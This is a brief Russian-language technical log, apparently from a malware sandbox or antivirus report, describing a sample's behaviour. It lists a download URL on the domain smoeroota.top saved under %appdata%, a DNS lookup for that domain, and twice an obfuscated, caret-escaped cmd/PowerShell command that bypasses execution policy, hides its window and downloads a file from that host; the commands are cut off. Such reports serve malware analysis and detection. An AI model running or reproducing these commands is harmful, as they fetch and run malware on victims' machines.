Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWERS^h^e^Ll.E^Xe -e^xeCUT^I^oNpO^L^ICY^ b^ypAsS -^N^oPRoF^Il^e -w^InD^OWs^Tyle H^Id^DeN (nEw^-Ob^JecT s^Y^S^T^Em.nET.^w^Eb^c^LiENt^).^d^o^WnloA^d^fil^E^('http://smoeroota.top/re...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /C "poWERS^h^e^Ll.E^Xe -e^xeCUT^I^oNpO^L^ICY^ b^ypAsS -^N^oPRoF^Il^e -w^InD^OWs^Tyle H^Id^DeN (nEw^-Ob^JecT s^Y^S^T^Em.nET.^w^Eb^c^LiENt^).^d^o^WnloA^d^fil^E^('http://smoeroota.top/re...' (со скрытым окном)